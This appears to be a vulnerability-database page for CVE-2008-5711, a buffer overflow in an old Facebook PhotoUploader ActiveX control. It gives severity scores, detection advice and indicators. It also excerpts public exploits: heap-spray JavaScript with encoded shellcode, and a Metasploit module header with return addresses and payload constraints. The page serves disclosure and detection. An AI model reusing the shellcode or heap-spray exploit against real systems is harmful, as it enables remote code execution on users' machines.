CVE-2008-5711
published 2008-12-24CVE-2008-5711: Heap-based buffer overflow in the Facebook PhotoUploader ActiveX control 5.0.14.0 and earlier allows remote attackers to execute arbitrary code via a long…
PriorityP353critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
32.70%
98.1th percentile
Heap-based buffer overflow in the Facebook PhotoUploader ActiveX control 5.0.14.0 and earlier allows remote attackers to execute arbitrary code via a long FileMask property value.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| photouploader | <= 5.0.14.0 | — | |
| photouploader | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u0D0D%u0D0D%u9090%u9090
bytes↗
0x969606eb
- →Detect heap spray targeting address 0x0d0d0d0d via repeated %u0D0D%u0D0D unescape patterns in browser JavaScript, indicative of exploitation of the Facebook PhotoUploader ActiveX control. ↗
- →Monitor for instantiation of the ImageUploader4.ocx ActiveX control in Internet Explorer, particularly invocations of the ExtractIptc() method or setting of the FileMask property with long strings. ↗
- →The Metasploit module uses oleacc.dll SEH handler at 0x74c9de3e as the return address on IE 6 SP0-SP2 / Windows XP SP2; look for ROP/SEH overwrites targeting this address. ↗
- →Payload bad characters for this exploit are null byte, tab, newline, carriage return, single quote, and backslash; payloads avoiding these characters in ActiveX property values should be treated as suspicious. ↗
- ·The Metasploit module targets only IE 6 SP0-SP2 on Windows XP SP2 Pro English; the hardcoded return address (0x74c9de3e from oleacc.dll) is version-specific and will not work on other OS/browser combinations. ↗
- ·The NVD description references the FileMask property as the overflow vector for version 5.0.14.0, while the Metasploit module and exploit-db PoC target the ExtractIptc() method in ImageUploader4.ocx 4.5.57.0; these are distinct attack vectors across two different control versions. ↗
- ·The exploit payload space is limited to 800 bytes with a stack adjustment of -3500, constraining the size and type of shellcode that can be delivered. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-5711 Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)
Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: facebook_extractiptc.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Facebook Photo Uploader 4.
By sending an overly long string to the "ExtractIptc()" property located
in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE
Exploit-DB
FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow
exploitdb·2008-02-12
CVE-2008-5711 FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow
FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow
---
var shellcode = unescape("%u0D0D%u0D0D%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063");
var address = 0x0d0d0d0d;
var block_size = 0x400000;
var blocks = (address - block_size) / block_size;
var spray = unescape("%u0D0D%u0D0D");
var tmp = unescape("%u0D0D%u0D0D");
var tmp_size = 1044;
while((spray.l
Exploit-DB
FaceBook PhotoUploader - 'ImageUploader4.ocx 4.5.57.0' Remote Buffer Overflow
exploitdb·2008-02-03
CVE-2008-5711 FaceBook PhotoUploader - 'ImageUploader4.ocx 4.5.57.0' Remote Buffer Overflow
FaceBook PhotoUploader - 'ImageUploader4.ocx 4.5.57.0' Remote Buffer Overflow
---
FaceBook PhotoUploader Buffer Overflow Exploit
function Check() {
var buf = unescape("%u4141");
while (buf.length
Unable to create object
# milw0rm.com [2008-02-03]
Metasploit
Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
metasploit
Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the "ExtractIptc()" property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
2008-12-24
Published